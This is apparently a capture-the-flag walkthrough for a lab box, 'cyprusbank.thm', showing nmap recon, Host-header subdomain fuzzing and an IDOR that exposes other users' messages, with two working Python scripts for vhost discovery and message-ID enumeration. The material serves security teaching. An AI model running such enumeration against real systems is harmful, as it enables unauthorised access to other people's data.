Keywords: Privilege Escalation using Sudo, Server Side Template Injection (SSTI), Insecure Direct Object Reference (IDOR)

Okay, but this is the most painful challenge I've ever seen! I had to restart the target machine several times just because of the nature of the SSTI payload. Because of that, the target machine's IP address differs across the screenshots.

Machine’s IP address: 10.10.2??.???

Attacker’s IP address: 10.4.126.108 (OpenVPN to local)

1. Recon

As always, start with nmap -sC -sV 10.10.224.84, which gives us two open ports: 22 (SSH) and 80 (HTTP).


But we can't access http://10.10.224.84 directly, because the site expects the hostname cyprusbank.thm, which our machine cannot resolve yet, just like in this challenge:

Lookup

After adding cyprusbank.thm to /etc/hosts, open the browser again:


Scanning for sub-directories with dirsearch gives us nothing. But scanning for subdomains (virtual hosts on the same IP) with FFUF and the wordlist below, we discover a new subdomain: admin.cyprusbank.thm


Adding the new subdomain to /etc/hosts as well, we find a login page, and we log in with the given credentials…
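The subdomain scan above works because every virtual host lives on the same IP, so the only thing that changes between requests is the Host header; a real hit answers with a different status or body size than the catch-all default. Here is that logic as a small Python script. It is an added example, not code from the original write-up: the target IP and the base domain come from the page, while the wordlist is a constructed stand-in for the real one and the "nonexistent" baseline host is my own choice.

```python
"""Virtual-host (subdomain) discovery by fuzzing the Host header.

Added example for the write-up, not the author's own tooling. Redirects
are deliberately NOT followed: on this box the default vhost answers with
a redirect to cyprusbank.thm, and that redirect is itself the baseline
we compare every candidate against.
"""
import urllib.error
import urllib.request
from dataclasses import dataclass

TARGET = "10.10.224.84"          # from the page (changes across restarts)
DOMAIN = "cyprusbank.thm"        # from the page
# Constructed wordlist; the page used a larger one it doesn't reproduce.
WORDLIST = ["www", "admin", "dev", "mail", "staging", "api"]


@dataclass(frozen=True)
class VhostResult:
    host: str
    status: int
    length: int


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Return None so a 3xx surfaces as HTTPError instead of being followed."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def probe_vhost(target: str, host: str, timeout: float = 5.0) -> VhostResult:
    """GET http://<target>/ with a spoofed Host header; record status and body length."""
    req = urllib.request.Request(f"http://{target}/", headers={"Host": host})
    try:
        with _OPENER.open(req, timeout=timeout) as resp:
            return VhostResult(host, resp.status, len(resp.read()))
    except urllib.error.HTTPError as e:      # 3xx/4xx/5xx still carry a body
        return VhostResult(host, e.code, len(e.read()))


def filter_hits(results, baseline: VhostResult):
    """Keep responses that differ from the default vhost in status or size.

    This is the same idea as ffuf's -fc/-fs filters: anything identical to
    the catch-all answer is noise, anything else is a real virtual host.
    """
    key = (baseline.status, baseline.length)
    return [r for r in results if (r.status, r.length) != key]


def vhost_fuzz(target: str, domain: str, words):
    """Establish a baseline with a host that cannot exist, then try every word."""
    baseline = probe_vhost(target, f"nonexistent-baseline-xyz.{domain}")  # assumed unused name
    results = [probe_vhost(target, f"{w}.{domain}") for w in words]
    return filter_hits(results, baseline)


if __name__ == "__main__":
    for hit in vhost_fuzz(TARGET, DOMAIN, WORDLIST):
        print(f"[+] {hit.host}  status={hit.status}  size={hit.length}")
```

The equivalent FFUF invocation is ffuf -u http://10.10.224.84/ -H "Host: FUZZ.cyprusbank.thm" -w wordlist.txt -fs <baseline size>, where the baseline size is what a random non-existent host returns; without that filter every word "hits", because the default vhost answers all of them.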

2. Exploit IDOR

Resource: https://portswigger.net/web-security/access-control/idor


Looking at the URL, we see "c=5". If you change the number to something else, you see a different message: the server trusts the c parameter and never checks that the message belongs to our account. But what happens if we send "c=0"? (Exploiting the IDOR by stepping the ID to the nearest integers.)
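Rather than editing c= by hand, the neighbouring IDs can be walked with the logged-in session and every response that differs from our own message collected. The script below is an added example, not code from the original write-up: the admin.cyprusbank.thm host and the c parameter come from the page, while the /messages path and the raw Cookie header value are assumptions you replace with what your browser actually sent.

```python
"""IDOR enumeration of the message endpoint behind admin.cyprusbank.thm.

Added example for the write-up, not the author's own tooling. Only the
host and the ?c=<id> parameter are from the page; PATH and COOKIE are
assumptions to be filled in from the intercepted request.
"""
import urllib.error
import urllib.parse
import urllib.request

BASE = "http://admin.cyprusbank.thm"
PATH = "/messages"                    # assumption: copy the real path from the browser
COOKIE = "session=PASTE_YOUR_SESSION_COOKIE_HERE"  # assumption: copy from the browser


def candidate_ids(seen: int, span: int = 5):
    """IDs adjacent to the one we were handed, plus 0, the 'nearest integer' trick.

    Sorted so 0 (often a seeded/admin record) and the low IDs come first.
    """
    ids = {0} | {seen + d for d in range(-span, span + 1)}
    ids.discard(seen)                 # we already have our own message
    return sorted(ids)


def fetch_message(msg_id: int, cookie: str = COOKIE, timeout: float = 5.0):
    """GET <BASE><PATH>?c=<msg_id> with our session; return (status, body)."""
    url = f"{BASE}{PATH}?{urllib.parse.urlencode({'c': msg_id})}"
    req = urllib.request.Request(url, headers={"Cookie": cookie})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def enumerate_messages(ids, cookie: str = COOKIE):
    """Return {id: body} for every ID the server happily served with HTTP 200."""
    found = {}
    for i in ids:
        status, body = fetch_message(i, cookie)
        if status == 200:
            found[i] = body
    return found


def unseen(results: dict, own_body: str) -> dict:
    """Drop responses identical to our own message; what remains is data we were not meant to see."""
    return {i: b for i, b in results.items() if b != own_body}


if __name__ == "__main__":
    own_id = 5                                     # the c=5 we were logged in with
    _, own_body = fetch_message(own_id)
    leaked = unseen(enumerate_messages(candidate_ids(own_id)), own_body)
    for i, body in leaked.items():
        print(f"[+] c={i}\n{body}\n")
```

Because the check is "did the server answer 200 with something other than my own message", the same loop doubles as a quick regression test after the bug is fixed: a correct implementation returns 403 or 404 for every ID that is not ours, so leaked comes back empty.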


Reading the message, do you know which admin account we will type?